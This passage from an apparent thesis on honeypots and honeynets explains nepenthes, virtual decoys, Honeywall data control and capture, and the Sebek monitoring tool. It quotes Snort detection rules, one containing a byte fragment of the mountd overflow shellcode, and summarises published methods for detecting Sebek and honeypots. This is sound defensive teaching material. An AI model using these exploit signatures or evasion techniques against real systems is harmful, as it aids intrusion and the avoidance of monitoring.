the following. An overview about the individual components and their interaction is given in Figure 2.2. The core of the low-interaction honeypot is formed by a number of vulnerability modules. These modules emulate known security weaknesses in Windows-specific system services, e.g., the Microsoft SQL Server 2000 database management system, the Microsoft Internet Information Services 5.0 (IIS 5.0) web server, or the Distributed Component Object Model (DCOM) interface (see Microsoft Corporation, 2002, 2003a,b). It is important to note, however, that nepenthes does not simulate the complete behavior of a service, but rather certain program fractions that are of relevance to the vulnerability. As Wicherski and Holz (2006) point out, these fractions are usually sufficient to deceive malicious binaries and provoke an attack. In comparison to other electronic baits, this approach has several advantages: First, system requirements regarding processing resources and memory are quite low. As a result, the solution is highly scalable, and multiple instances of nepenthes can be deployed in parallel. Second, development efforts are dramatically reduced. For instance, Bächer et al. (2006) note that a working module often comprises less than 500 lines of source code. Due to the decreased level of complexity, honeypot administrators may also quickly react to emerging threats. For example, in 2004, the Local Security Authority 9 2 Honeypot Technology Subsystem Service (LSASS) in the Microsoft Windows operating system was prone to a so-called buffer overrun (see Microsoft Corporation, 2004c): A sophisticated attacker could remotely overwrite sections of internal memory by sending a specially crafted character sequence to the service. As a consequence, it was possible to execute arbitrary malicious code and get in control of the underlying machine. Shortly after the release of the official security bulletin, a Proof of Concept (PoC) paper was published that successfully demonstrated the exploitation of the security weakness (see SecurityFocus, 2004; Wicherski and Holz, 2006). Based on this information, the nepenthes development team was able to program a corresponding vulnerability module and simulate an affected platform within a short amount of time. In consequence, it was possible to study the penetration technique in more detail and quickly start capturing newly spreading attack tools. When an emulated service is compromised, the payload or shellcode of the attack is passed to a shellcode parsing module. The shellcode is frequently stored within a character array and contains instructions in assembly machine language that are injected in the target program in order to manipulate its functionality (see Koziol et al., 2004). The instructions must not include any null tokens though, because these are interpreted as string terminators and may cause the attack to fail (see Aleph One, 1996). To properly cope with this issue, adversaries usually encode their payload with exclusive or (XOR) operators. As Bächer et al. (2006) argue, this procedure also helps evade certain sensors of intrusion detection systems. Therefore, to restore the original payload used during the intrusion, the parsing module must first decode the captured character sequence. The result can then be examined with the help of regular expressions in the next step, e.g., to find the source address of the respective binary. This information is needed by the fetch modules to retrieve the sample from the Internet. At the time of this writing, different transfer modes and network protocols such as HTTP (Hypertext Transfer Protocol), FTP (File Transfer Protocol), or TFTP (Trivial File Transfer Protocol) are supported. Furthermore, two special modules are capable of dealing with IRC-related (Internet Relay Chat-related) propagation methods that are favored by certain viruses, worms and other types of Internet threats (see Holz, 2005). After a malicious file has been downloaded from its remote location, it can either be stored on the local hard disk, sent to a central database, or directly to a sandbox for further investigation. These tasks are performed by the submission modules. In the latter case, the executable is safely launched within a controlled environment (see Willems et al., 2007). Thereby, it is, for instance, possible to observe manipulations of the file system structure, while mitigating the risk for uninvolved third parties as best as possible. Apart from the program modules, nepenthes offers a number of additional features that facilitate collecting autonomously spreading malware on a large scale, including a virtual file system and a rudimentary, emulated shell attackers can interact with. Moreover, the software comprises sophisticated logging capabilities that even permit monitoring 10 2 Honeypot Technology penetration attempts in real time. Last but not least, with the DNS (Domain Name System) resolver module and an internal geographic database, attacks can be efficiently traced to their country of origin. In sum, security professionals are thus able to generate extensive statistical reports about adversaries and their intrusion strategies. Most of the components described above can be tweaked and adapted, making the low-interaction honeypot a very flexible and powerful tool (see Bächer et al., 2006). We will illustrate the individual configuration options of the decoy in more detail in Chapter 4. We will also illustrate how a bootable device with a pre-configured, fully working nepenthes sensor can be developed. This device can make the deployment of numerous electronic baits significantly easier. 2.5 Deployment Options for Honeypots There exist two basic deployment options for electronic baits (cmp. Provos and Holz, 2007): A physical honeypot runs on a dedicated machine with its own IP address on the network. As a result, the decoy closely mimics the characteristics and behavior of a real computer system. Thus, attackers may fully interact with the host and get in complete control of the system platform. On the other hand though, physical honeypots are “typically expensive to install and maintain” (see Provos and Holz, 2007, p. 11). Furthermore, the solution is hardly scalable, because different components and devices must be acquired for each machine. Consequently, hardware costs quickly skyrocket when multiple electronic baits must be set up. With respect to this case, an alternative and more reasonable approach is deploying several virtual honeypots on a single system. A virtual honeypot is built on top of a virtual machine, i.e., an isolated, secure, and reliable computing environment (see Creasy, 1981). It shares all its resources with the underlying host system and possibly other guest systems that are executed in parallel on the computer. A sample illustration of a virtual honeypot setup is presented in Figure 2.3(a). In the given example, two guest systems with the private IP addresses 192.168.1.1 and 192.168.1.2 are installed on a host that is directly connected to the Internet. In order to prevent collisions between the guest systems, a special software layer, the virtual machine monitor (VMM), simulates replicas of the physical components. Thereby, each machine appears to have its own CPU (Central Processing Unit), memory, graphics adapter, network interface, and I/O (Input/Output) interface (see Figure 2.3(b) and Parmelee et al., 1972; Goldberg, 1974). As a consequence, security professionals can maintain various decoys with different operating systems as well as applications on one computer, while keeping hardware costs down at the same time. In comparison to their physical counterparts, virtual honeypots also have a number of additional benefits (cmp. Provos and Holz, 2007): First, the electronic baits are easier to maintain, because they are stored as plain files on the underlying host system. Thus, they can be copied, shared, and distributed without difficulty. This technique also 11 2 Honeypot Technology (a) (b) Figure 2.3: Setup and Architecture of a Virtual Honeypot (Source: Provos and Holz, 2007; VMWare, 2006) permits taking snapshots of a running system and saving its current state. Thus, it is possible to quickly restore the configuration of a decoy after it has been compromised. Regarding the implementation of the virtual environment, two software products are primarily referenced in the literature (see also Honeynet Project, 2004b): The open source application User-mode Linux6 (UML) by Jeff Dike is an architectural port to the Linux interface (see Dike, 2006; Honeynet Project, 2002a). It creates an executable binary of the core libraries. As a result, the kernel can be started as a normal process in user space and boot a second, Linux-based operating system. System calls that are sent to the UML instance are then transparently passed to the host and are processed by the underlying machine. This behavior is illustrated in Figure 2.4. Even though the approach helps create a guest system on the target platform, the UML instance can be fingerprinted quite easily as demonstrated by Provos and Holz (2007). Therefore, the authors strongly discourage from using the application for honeypots in practice. 6 http://user-mode-linux.sourceforge.net/ 12 2 Honeypot Technology Figure 2.4: Architecture of User-Mode Linux (Source: Based on Dike, 2006) A more advanced technology are the virtualization software solutions that are offered by VMWare7 . In the scope of this thesis, we focus on the free VMWare Server8 . The application provides a comfortable graphical user interface for administrative tasks and even permits configuring virtual machines remotely over the Internet. In contrast to UML, the product supports both Linux and Microsoft Windows operating systems as well as other platforms such as Sun Solaris and Novell NetWare. It is highly scalable and emulates complete x86-based computer systems. Due to these characteristics, multiple, concurrently running virtual electronic decoys can be deployed. What is more, with the help of a virtual bridge that is set up during the installation process of the software, each honeypot is assigned its own IP address and, thus, may act as an entirely separate machine on the network (see Provos and Holz, 2007, p. 27). A high-level overview about this architecture is shown in Figure 2.5. In spite of these features, sophisticated adversaries are potentially able to detect the virtual environment, e.g., by recognizing subtle differences in the hardware layer of a machine (see Holz and Raynal, 2005a,b). In this case, the presence of a honeypot is possibly revealed, and the device is likely to be evaded in the future as we have already explained. As Provos and Holz (2007, p. 22) conclude, the approach may thus “lead to less information about attackers”. 7 8 http://www.vmware.com/ http://www.vmware.com/products/server/ 13 2 Honeypot Technology Figure 2.5: Illustration of the Bridged Networking Functionality in VMWare (Source: Based on Provos and Holz, 2007) 2.6 Summary In this chapter, we have presented the methodic and technical concepts of honeypots. Honeypots are computer systems which are intentionally designed insecurely. They act as electronic baits and enable security professionals to learn more about the tools, tactics, and motives of adversaries. When they are deployed within a productive environment, they can help detect penetration attempts at the network perimeter and protect the resources of an organization against Internet threats. Because all interactions with a decoy are malicious by definition, captured data sets are quite small. Moreover, in comparison to traditional monitoring stations such as intrusion detection systems, the number of encountered false positives is significantly lower. In dependence of the level of involvement and risk, we have distinguished two types of electronic baits: A high-interaction honeypot offers attackers a real operating system to interact with. In contrast, a low-interaction honeypot only emulates specific system services. Neither of these solutions is superior to the other. Both approaches rather have their own advantages and disadvantages, as it is indicated in Table 2.1 (see also Honeynet Project, 2004b; Provos and Holz, 2007). For this reason, the individual characteristics of the technologies must be carefully judged, particularly with regard to the organizational objectives (cmp. Spitzner, 2001b, 2002). We have also differentiated between physical and virtual honeypots: A physical honeypot runs on a dedicated machine with its own IP address and closely mimics the behavior of a real computer system. On the other hand, a virtual honeypot is executed within a separate and secure computing environment. Since system resources are shared between the individual guest systems, it is possible to deploy multiple decoys on a single host. Thereby, hardware costs and maintenance efforts can be effectively reduced. 14 2 Honeypot Technology Low-Interaction Honeypots easy installation, configuration, and deployment limited information capturing capabilities, e.g., authentication credentials entered by the adversary possibility to generate statistics at a higher level of abstraction minimal risk, because solely emulated services are exposed to attacks High-Interaction Honeypots increased complexity, harder to install and to maintain extensive information capturing capabilities possibility to analyze intrusions in detail, including tools, communications, and keystrokes of adversaries higher risk as attackers are offered complete operating systems and fully working services to interact with Table 2.1: Advantages and Disadvantages of Low-Interaction and High-Interaction Honeypots We have given an overview about two software products that are capable of setting up a virtual environment: User-mode Linux patches the system core in order to execute numerous instances of a Linux-based operating system on top of the host kernel. The virtualization software VMWare emulates a complete x86-based computer systems and supports a variety of different operating systems. In the scope of this thesis, we focus on the freely available VMWare Server. It offers a comfortable user interface that makes the administration of our virtual honeypots significantly easier. It is important to note though that the value of electronic baits can be highly increased when they are linked in a so-called honeynet. We will have a closer look on this technology in the next chapter. 15 3 Honeynet Technology In the previous chapter, we have illustrated the concept and value of honeypots. Individually deployed electronic baits share a common problem though: As stand-alone systems, they have a narrowed field of view, i.e., they do not capture malicious activities, unless they are attacked directly (see Spitzner, 2002, 2003a). Therefore, a more meaningful approach is building a so-called honeynet and learn about security-related incidents on a network-wide scope. It is then possible to link data accumulated from different machines, e.g., to create a more accurate profile of adversaries after an intrusion. A honeynet is a group of honeypots that are set up and interconnected behind a special gateway with monitoring and filtering capabilities (cmp. Honeynet Project, 2004b; Curran et al., 2005). As such, a separated, highly controlled environment can be created as indicated in Figure 3.1. Similar to a honeypot, the purpose of a honeynet lies in being probed, attacked, and compromised (see Honeynet Project, 2006). However, in comparison to a single system, information collected about threats is more expressive and, hence, more valuable as we have already noted above. On the other hand, the level of complexity is significantly higher. That is why, certain guidelines have been proposed in order to safely deploy a honeynet. According to the Honeynet Project (2004a), the most important aspect that needs to be considered is data control. Data control is defined as the “containment of activity” (Honeynet Project, 2004b, p. 37), i.e., attackers must be prevented from affecting nonhoneynet systems (see Honeynet Project, 2005e). This request often turns out to be difficult to realize in practice, because organizations need to find a tradeoff between freedom and risk (cmp. Honeynet Project, 2004b): If adversaries are granted a higher degree of freedom, their behavior can be studied in detail, but the level of risk rises in parallel as well. Therefore, to mitigate threats as best as possible, several best practices have proven helpful: First, at least two different data control mechanisms and layers should be used to avoid a single point of failure. Second, implementations should permit manual intervention. Third and last, the system should completely block access to the honeynet in case all layers collapse. A second major element that must be taken into consideration when building a honeynet is data capture. This refers to the “monitoring and logging of all the blackhat’s activities” (Honeynet Project, 2004b, p. 39). In compliance with data control, it is suggested to implement multiple layers in order to observe adversaries as closely as possible. With regard to the the third factor, data analysis, it is crucial to store log files and other records created during incidents outside the honeynet in a secure location to en- 16 3 Honeynet Technology Figure 3.1: Overview about the Honeynet Architecture (Source: Based on Honeynet Project, 2006) sure the integrity of the captured data. Administrators are also advised to maintain standardized reports of each compromise. This approach facilitates a later classification of the observed intrusions and helps learn the tools, tactics, and motives of attackers (cmp. Honeynet Project, 2006). Outline of the Chapter As we will see, the technical implementation of the individual guidelines and requirements as described has changed significantly throughout the years (see also Honeynet Project, 2005d). Therefore, we first give a brief overview about historical honeynet architectures in Section 3.1. The current technologies and tools in use are subject of Sections 3.2 and 3.3. In Section 3.4, we illustrate the deployment process of a virtual honeynet and outline the setup of a future solution, so-called distributed honeynets. We conclude with a summary of the different concepts and methodologies in Section 3.5. 17 3 Honeynet Technology 3.1 Historical Implementations of Honeynets A preliminary version of a honeynet was already deployed in 1987 by the system manager Cliff Stoll (see Stoll, 2005). While working at the Lawrence Berkeley Lab, Stoll detected penetration attempts on multiple computer systems. He decided to watch the intruder over a period of several months and used rudimentary data capture and data control mechanisms. For instance, he created various interesting-sounding files that served as electronic decoys. Thereby, Stoll hoped to distract the attacker from other vulnerable network segments, while learning as much as possible about his intentions and motives at the same time. With the collected information, he was finally able to track down the adversary and uncover a severe case of industrial espionage. The first organizational honeynet solution was developed in 1999 by members of the Honeynet Project Research Alliance (see Honeynet Project, 2004b). The central element of the so-called GenI honeynet was formed by a conventional firewall. When a decoy was compromised, all outgoing network connections were blocked after a predefined limit had been reached. With the help of this simple data control mechanism, the external environment could be protected against automated scans and other types of malicious activities (see Spitzner, 2003b). On the other hand, data capture requirements were met by installing an intrusion detection system that recorded all inbound as well as outbound traffic flows. In case an alert was recognized, the device sent a notification message to a remote log server. Thereby, captured data sets could be effectively guarded against deletion and manipulation. The interaction between the different components is illustrated in Figure 3.2. With first generation honeynets, security professionals were able to study the behavior of autonomously propagating malware and low-skilled adversaries. In spite of these capabilities, the architecture suffered from several drawbacks (cmp. Honeynet Project, 2004b): First, network operations were entirely based on the TCP/IP network layer of the OSI (Open Systems Interconnection) reference model (see Stevens, 1994; Comer, 2000, for a complete description of the different network layers). As a result, all devices, including the firewall, the intrusion detection system, and the log server, were assigned their own IP addresses and were publicly accessible over the Internet. As participants of the Honeynet Project (2004b, p. 96) explain, “this reveal(ed) their existence to the probing blackhat, so the risk of becoming possible targets (was) high”. Second, as numerous software applications had to be installed and maintained, the deployment of a GenI honeynet was time-consuming and error-prone. Furthermore, stealthily capturing keystrokes as well as analyzing encrypted sessions was exceedingly complex (cmp. Spitzner, 2002), even though various tools helped facilitate this process (see Antonomasia, 2003; Floydman, 2002). In order to cope with these issues, the system setting was completely redesigned in 2001 and led to the development of new and advanced variants, so-called GenII and GenIII honeynets. We will present their functionality in the following sections. 18 3 Honeynet Technology Figure 3.2: Architecture of a GenI Honeynet (Source: Based on Honeynet Project, 2004b) 3.2 GenII Honeynets In comparison to first generation honeynets, GenII honeynets are more powerful and more efficient with regard to their observation capabilities, their detectability, and their ease of maintenance (cmp. Honeynet Project, 2004b). These key benefits result from two major architectural characteristics: First, the honeynet gateway is implemented as a transparent bridge (see Honeynet Project, 2005e). A bridge connects separated networks and operates as a data link on the second layer of the OSI reference model (cmp. Perlman, 1999). Data packets sent over this layer are known as frames and store a 48-bit number, the so-called Media Access Control (MAC) address. When a frame arrives at a bridge, its MAC address is extracted and looked up in an internal system table to identify its physical destination. If a matching entry is found, the frame is forwarded to its designated location. Otherwise, it is broadcasted to every network except the one it was received on (see Tanenbaum, 2003). It is important to note that these operations have no effect on protocols working on higher network layers, e.g., IP. As a consequence, a number of popular reconnaissance attacks are rendered useless (cmp. Honeynet Project, 2004b). For instance, adversaries often execute a traceroute command to monitor the TTL (Time to Live) field in the header of an IP packet enroute to a target. Because each intermediary machine decrements the TTL value by one (see Postel, 1981b), the presence of firewalls and IDSs can be easily discovered. On the other hand, when an IP packet passes through a bridge, 19 3 Honeynet Technology Figure 3.3: Architecture of a GenII Honeynet its TTL field is not modified. Therefore, an instance of the honeynet gateway is hard to detect. Moreover, compromising the device directly is difficult as well, because the bridging network interfaces do not have their own IP addresses (cmp. Honeynet Project, 2004b). However, it is still possible to administrate the gateway system over a remote connection as indicated by the dotted line in Figure 3.3. For this purpose, a third network interface card (NIC) is required. The second difference to GenI honeynets concerns the implementation of data control and data capture measures. Instead of deploying the required tools on separate machines, all applications are installed on the gateway system. Thus, malicious activities may effectively be blocked at a central point whenever it is desired. Because of this behavior, the honeynet gateway is also often referred to as the Honeywall. We will cover the individual components of the Honeywall according to their function in the following. 3.2.1 Data Control Implementations GenII honeynets use a combination of filtering and intrusion detection mechanisms to control inbound and outbound network traffic. The tools used on the Honeywall are netfilter, IPTables, and Snort Inline. • Netfilter and IPTables Network packets can be intercepted and manipulated on the honeynet gateway with the netfilter software1 . Netfilter operates on the kernel level and provides sophisticated rout1 see http://www.netfilter.org/ 20 3 Honeynet Technology Figure 3.4: Network Filtering Capabilities of the Honeynet Gateway ing and filtering capabilities that are required to implement a fully functional network firewall (cmp. Russell, 2002). Whenever a packet is about to enter or leave the honeynet, it is processed on the Honeywall and compared against a set of internal rules. Based on these rules, pre-defined actions can be taken. For instance, the packet may get accepted and be forwarded to the target machine, as it is indicated in Figure 3.4. Alternatively, it may also be rejected, e.g., to protect specific network segments and mitigate risks for uninvolved third parties as best as possible. A short description of the individual actions can be found in Table 3.1. Netfilter rules can be manipulated in user space with the help of the IPTables2 interface that was developed by Rusty Russell. For instance, to define a firewall exception for the honeypot with the IP address 192.168.1.2, we invoke the application with the -A parameter as follows: iptables -A INPUT -p tcp -- dport 22 -d 192.168.2.1 -j ACCEPT In the given example, we add a new rule to the packet filter in order to accept (-j parameter) inbound (INPUT parameter), TCP-based traffic flows (-p parameter), targeting 2 see http://www.netfilter.org/projects/iptables/index.html 21 3 Honeynet Technology Action ACCEPT DROP LOG REJECT QUEUE Description The packet is free to continue its path. The packet is silently rejected without sending an error message to the originator. The packet is logged with a user-defined informational text. The packet is rejected, and an error message is sent to the originator. The packet is placed on the queue and may be accessed by a user space process. Table 3.1: List of Possible netfilter Actions (Source: Based on Honeynet Project, 2004b, p. 103) State NEW ESTABLISHED RELATED INVALID Description The packet initiates a fresh connection. The packet belongs to an existing connection that transfers data in both directions. The packet is related to an existing connection, for example an FTP session. The packet could not be processed correctly and should generally be dropped. Table 3.2: List of Connection States as Distinguished by IPTables (Source: Honeynet Project, 2004b; Russell, 2002) the secure shell server on port 22 (--dport parameter) of the decoy (-d parameter). A complete overview about the myriad of IPTables commands and parameters is given by Russell (2002). In addition to the firewall rules, two components of IPTables are particularly relevant for implementing efficient data control mechanisms on the Honeywall: With the help of the state module, we are able to define fine-grained filter rules based on the connection state a packet is in (see Table 3.2). As a result, we can efficiently keep track of different network sessions. With the second, limit module, it is possible to restrict the maximum number of packets that are processed within a given time interval: After the specified limit has been reached, further packets are automatically discarded. The two components operate collaboratively on the gateway system. This functionality is called Connection Rate Limiting Mode (CRLM) and is particularly useful for preventing Denial of Service (DoS) attacks that are launched from compromised honeypots. In the course of a DoS attack, all resources of a system are consumed. As a consequence, services may not be accessed by legitimate users any longer (cmp. Moore et al., 2006). A well-known example for this type of incident is a SYN Flood (see CERT, 1996). The attack exploits an idiosyncrasy in the architecture of the TCP protocol: TCP 22 3 Honeynet Technology (a) (b) Figure 3.5: Illustration of a Full and a Half-Open TCP Handshake connections must be established with a so-called handshake (see Postel, 1981c; Stevens, 1994). The client initiates the communication channel by sending a synchronize (SYN) request to the server. The server acknowledges the request and returns a packet with both the SYN and ACK flags set. In turn, the client confirms the reply with a third packet to complete the handshake. This process is illustrated in Figure 3.5(a). If the last packet is not sent, however, the connection is left half-open (cmp. CERT, 1996, and Figure 3.5(b)). Thus, internal memory on the server is consumed. Consequently, if an adversary initiates a huge number of connections but does not acknowledge messages from the server, storage capacities are eventually exceeded. As a result, the performance level is degraded, and the target machine finally collapses. To prevent system crashes, Bernstein (1996) has proposed the use of SYN Cookies: Rather than maintaining a large TCP stack, the server calculates a specially crafted initial sequence number and entirely stores state-specific information about the connection in its response packet (see also Eddy, 2007). When the client replies with the final packet, the sequence number is checked, the connection state is restored, and the handshake is completed. On the other hand, flooding operations do not exhaust system resources any longer, but solely require temporary processor cycles. A different approach to cope with DoS attacks is implemented on the Honeywall: As soon as a certain number of connections has been established, the gateway device stops forwarding packets going out of the honeynet. Thereby, outbound network traffic can be controlled, and the external environment is protected. In practice, about 20 TCP connections, 20 UDP connections, 50 ICMP connections, and 10 other, non-IP connections per hour are regarded as adequate values (see Honeynet Project, 2005a). It is important to emphasize though that these settings are not sufficient to mitigate all potential threats. As Provos and Holz (2007, p. 65) point out, “connection limiting does not help if the attacker uses a specific exploit against another host”. With respect to this scenario, we must rely on Snort Inline, a second data control mechanism of the Honeywall. We outline the functionality of this application in the following. 23 3 Honeynet Technology • Snort Inline Snort Inline3 operates as a network intrusion prevention system (NIPS) on the honeynet gateway and is capable of efficiently blocking attacks going out of the honeynet. It closely interacts with the IPTables packet filtering software as follows: Data streams of outbound network packets are inspected by the NIDS to assess the level of risk for the external environment. If a potentially dangerous pattern is found, control is passed to the firewall, and the respective packet is dropped. This process is illustrated in Figure 3.6 and is known as Packet Drop Mode (PDM) (see Honeynet Project, 2004b, 2005e). It is crucial to note though that packet dropping does not affect legitimate, nonthreatening traffic flows. For example, outgoing DNS (Domain Name System) queries or NTP (Network Time Protocol) requests may safely pass the Honeywall without interference. Because of these characteristics, the presence of the gateway device can be effectively concealed from the eyes of probing blackhats (see Honeynet Project, 2004b). In addition, Snort Inline also supports a so-called Packet Replace Mode (PRM) which permits even more powerful and stealthy operations. In contrast to PDM, a suspicious packet is not completely dropped, but solely specific sections in its header or body are modified. As a result, the malicious payload can be rendered ineffective. An example of a PRM rule that mutates the exploit code of the NFS mountd buffer overflow attack is shown in Listing 3.1 (cmp. Caswell et al., 2007, p. 614). The attack targets a running NFS (Network File System) server on port 635 which is frequently used to share files over the network (see CERT, 1998). By overwriting an internal memory buffer, an adversary may spawn a remote shell and execute arbitrary code with administrative privileges. Thereby, full control of the underlying system platform may be gained. Figure 3.6: Packet Drop Mode (PDM) of Snort Inline 3 see http://snort-inline.sourceforge.net/ 24 3 Honeynet Technology 1 2 3 4 5 6 7 8 alert udp $EXTERNAL_NET any -> $HOME_NET 635 ( msg :" EXPLOIT x86 Linux mountd overflow "; content :"| EB56 5 E56 5656 31 D2 8856 0 B88 561 E |"; r e p l a c e :"|6565 6565 6565 6565 6565 6565 6565|"; reference : cve , CVE -1999 -0002; reference : bugtraq ,121; classtype : attempted - admin ; sid :316; rev :3;) Listing 3.1: Sample Rule for the Packet Replace Mode (PRM) of Snort Inline As can be seen on Line 3 of Listing 3.1, the exploit can be identified with the data sequence EB56 5E56 5656 31D2 8856 0B88 561E. If the string is observed in a packet stream, it it automatically replaced with a number of tokens, in this case, a series of simple e letters with the corresponding hexadecimal value Ox65. As a consequence, the shellcode cannot be successfully executed any longer, and the compromise attempt fails (see also Caswell et al., 2007). Writing PRM rules requires a thorough knowledge and deep understanding of the individual exploit functions (see Honeynet Project, 2004b). On the other hand, the technology facilitates observing intruders for longer periods of time: As Provos and Holz (2007, p. 65) point out, “given the difficulties of making exploits work in the wild (...), there is a high probability that intruders would not detect the presence of the Honeywall for some time and therefore continue to try different forms of attacks”. 3.2.2 Data Capture Implementations Similar to data control implementations, security professionals rely on multiple data capture layers in order to study the behavior and intentions of adversaries. The prevalent tools and applications that are required for these tasks are presented in more detail in the following sections. • IPTables and Swatch We have already introduced IPTables as a powerful data control mechanism. Due to its sophisticated routing and filtering capabilities, risks for uninvolved third parties can be mitigated. On the other hand, the software may be effectively used for data capturing activities as well: In cooperation with the syslogd daemon of the operating system, network connections can be logged to the file /var/log/messages. More importantly, with the help of Swatch, it is possible to automatically send email messages about specific events within the honeynet. Thus, administrators are able to quickly react to incidents, if this proves to be necessary. 25 3 Honeynet Technology 1 2 3 watchfor / Firewall : OUTBOUND CONNECTION / echo normal mail = admin@honeynet . org , subject = Outbound Connection 4 # l i m i t t h e number o f e m a i l a l e r t s t o one m e s s a g e p e r h o u r throttle 1:0:0 5 6 Listing 3.2: Example of a Swatch Configuration File Swatch4 (Simple Watcher) is a Perl-based utility that was developed by Todd Atkins for monitoring system log files in real time (see Hansen and Atkins, 1993). When a new log record is created, it is matched against certain patterns that are listed in the main configuration file of the application. A pattern can be a simple word or a more complex regular expression (see Bauer, 2001). If a match is found, a notification procedure is triggered, and an alert is mailed to a pre-defined contact person. For instance, in the sample configuration file shown in Listing 3.2, the supervisor of a honeynet is informed about outbound network connections. These types of messages must generally be taken seriously, because they potentially indicate the successful compromise of a decoy (cmp. Honeynet Project, 2004b). However, for maintenance reasons, we recommend to limit the number of generated warnings, using the throttle keyword as illustrated in Line 6 of Listing 3.2 (see also Spitzner, 2000). Thus, Swatch solely sends a summary report about logged elements in a given time interval, in our case, a period of one hour. According to our experiences, this value is acceptable for responding to security-related occurrences within the honeynet in time. • Snort The open source network intrusion detection system (NIDS) Snort5 forms the second data capturing layer on the Honeywall. It supports two different runtime modes: In packet sniffing and logging mode, Snort records all traffic flows that are about to enter or leave the honeynet. Data streams are saved as raw binary files. Thereby, the data capture process is significantly accelerated, because network packets are not converted into a human-readable format first (see Caswell et al., 2007). In addition, the generated files can be directly imported into network analysis and forensic applications such as Tcpdump6 or Wireshark7 . As we will see in Chapter 5, these applications are very powerful and greatly facilitate the investigation of an incident. For example, it is possible to restore a FTP session that was initiated in the course of a system compromise and recover the steps of the intruder. 4 see see 6 see 7 see 5 http://swatch.sourceforge.net/ http://www.snort.org/ www.tcpdump.org/ www.wireshark.org/ 26 3 Honeynet Technology 1 2 #r u l e h e a d e r alert tcp $EXTERNAL_NET any -> $INTERNAL_NET 80 3 # rule options ( msg : " WEB - IIS CodeRed v2 root . exe access " ; flow : to_server , established ; uricontent : " / root . exe " ; nocase ; reference : url , www . cert . org / advisories / CA -2001 -19. html ; classtype : web - application - attack ; sid :1256; rev :8;) 4 5 6 7 8 9 10 Listing 3.3: Sample Rule of the Snort Intrusion Detection System When running in intrusion detection mode, Snort inspects each packet based on a list of attack-specific detection rules in order to discover potentially dangerous operations. A detection rule consists of a header and corresponding rule options. The header defines the action that is taken in case a threat is discovered, the transport protocol used by the packet, as well as basic IP and port matching criteria. The rule option section contains processing-related instructions and metadata information, e.g., references to relevant security advisories (cmp. Caswell et al., 2007). A complete overview about the individual rule components is given by Sourcefire (2009). An example of a Snort rule is shown in Listing 3.3 (cmp. Caswell et al., 2007, p. 302). It affects TCP-specific traffic flows that enter the honeynet on an arbitrary port and are destined for web servers running on port 80. As can be seen on Line 7, suspicious packets are identified by the string /root.exe, a fingerprint of the Code Red worm. The worm caused severe havoc in 2001 and is still propagating in the wild at the time of this writing (cmp. CERT, 2001a,b, and Chapter 5). If the string pattern is detected, an alert message is generated on the Honeywall (cmp. Line 1 of Listing 3.3), and the incident is logged. However, it is important to note that worm attacks and particularly new types of malicious activities can only be properly recognized if the Snort rule set is carefully kept up to date at all times. With the help of Oinkmaster8 that is part of the Honeywall, this process can be significantly facilitated. Oinkmaster automatically downloads the latest signatures from a pre-defined rule repository (see Östling, 2006). It is capable of importing both the official, high-quality definitions that are commercially distributed by the Vulnerability Response Team (VRT)9 as well as slightly reduced versions that are provided free of charge by members of the Snort community10 . A severe downside of intrusion detection systems is their inability to cope with encrypted network traffic (cmp. Honeynet Project, 2004b). Consequently, if adversaries establish connections over secure protocols such as TLS (Transport Layer Security) or 8 see http://oinkmaster.sourceforge.net/ see http://www.snort.org/vrt/buy-a-subscription 10 see http://www.snort.org/snort-rules 9 27 3 Honeynet Technology SSL (Secure Sockets Layer), penetration attempts cannot be reliably monitored any longer. In order to solve this problem, a third data capture layer needs to be implemented. A description of this layer is subject of the next section. • Sebek As participants of the Honeynet Project (2004b) explain, intruders frequently use encryption techniques to protect their communication channels from network surveillance devices. Common cryptographic algorithms such as AES (Advanced Encryption Standard, see NIST, 2001) or 3DES (Triple Data Encryption Standard, see NIST, 1999) are extremely difficult to break, even though a number of attack strategies have been developed more recently (see Bernstein, 2005; Osvik et al., 2006; Lucks, 1998). In spite of these efforts, the algorithms are considered to be secure at the time of this writing. Thus, to effectively observe the behavior of adversaries, security professionals must circumvent the respective encryption routines. The open source utility Sebek11 makes these types of operations comparatively easy by intercepting network packets after they have passed the decryption engine of the operating system (see Honeynet Project, 2003c). It is available free of charge for different system platforms, including Linux, Microsoft Windows, OpenBSD, and Solaris. In the scope of this thesis, we focus on the Linux-based version of the software, although the concepts outlined below can also be applied to most other distributions. With respect to its system architecture, Sebek consists of a client and a server component. The client must be installed on each decoy within the honeynet. In contrast, the server runs within a central location on the Honeywall. On the side of the client, Sebek is capable of collecting extensive information about attackers. In particular, the application can record the keystrokes of miscreants as well as recover the tools that were transferred to a honeypot in the course of a compromise. For these purposes, the internal System Call Table of the kernel must be manipulated. To be more precise, Sebek redirects specific system calls, e.g., to the internal read() or open() function, to its own data handling procedure. Thus, when a system call is invoked, the respective data stream can be logged, before control is passed back to the operating system. An overview about this process is illustrated in Figure 3.7. The captured data is wrapped in a notification packet and is sent unidirectionally across the network to the server for further analysis (cmp. Figure 3.8). Once it reaches its destination, it may either be stored in a relational database, or it can be directly processed on the command line with the sbk extract and sbk ks log.pl utilities. For example, to inspect a packet that is destined for port 1101 of the interface eth0, we must execute the utilities as follows: sbk_extract -i eth0 -p 1101 | sbk_ks_log . pl 11 see http://www.honeynet.org/tools/sebek/ 28 3 Honeynet Technology Figure 3.7: Redirection of System Calls in the Sebek Monitoring Software (Source: Based on Honeynet Project, 2003c) Figure 3.8: Covert Data Channel Used by the Sebek Monitoring Software (Source: Based on Honeynet Project, 2003c) 29 3 Honeynet Technology To mitigate the risk of detection, Sebek uses several mechanisms to hide its presence from the eyes of probing blackhats: First, with the help of a cleaning component, the application is removed from the list of loaded kernel modules. Second, the software implements its own raw socket interface. As a consequence, the TCP/IP stack of the operating system can be completely bypassed, and notification packets cannot be blocked by firewall devices such as IPTables any longer. In addition, Sebek can be configured to store a so-called magic value and a specific destination port number inside each packet. If another system within the honeynet finds such a packet, it is silently ignored. Thus, a covert channel is created, and intruders are unable to discover the data transfer even if a network sniffing program such as TCPDump is run. In spite of these features, adversaries have attempted to exploit architectural weaknesses in the Sebek client more recently in order to reveal the monitored environment. For instance, Madsys (2003) presented a brute force algorithm that is capable of finding traces of the Sebek module header in memory (see also Holz and Raynal, 2005a). With similar memory inspection techniques, sensitive configuration parameters of the keystroke logging utility could be disclosed or even changed (see Corey, 2004). These parameters are also likely to be found when specific heuristic algorithms are applied (see Dornseif et al., 2004b; Holz and Raynal, 2005a). A different detection strategy was demonstrated in the work of Dornseif et al. (2004a) with their proof of concept application Kebes: The software uses the mmap() function of the system kernel to map the contents of a file directly into the internal address space. As a result, logging operations could be fully circumvented, because the read() system call was not invoked at any time. In addition, Keong (2004) succeeded in restoring the original System Call Table on 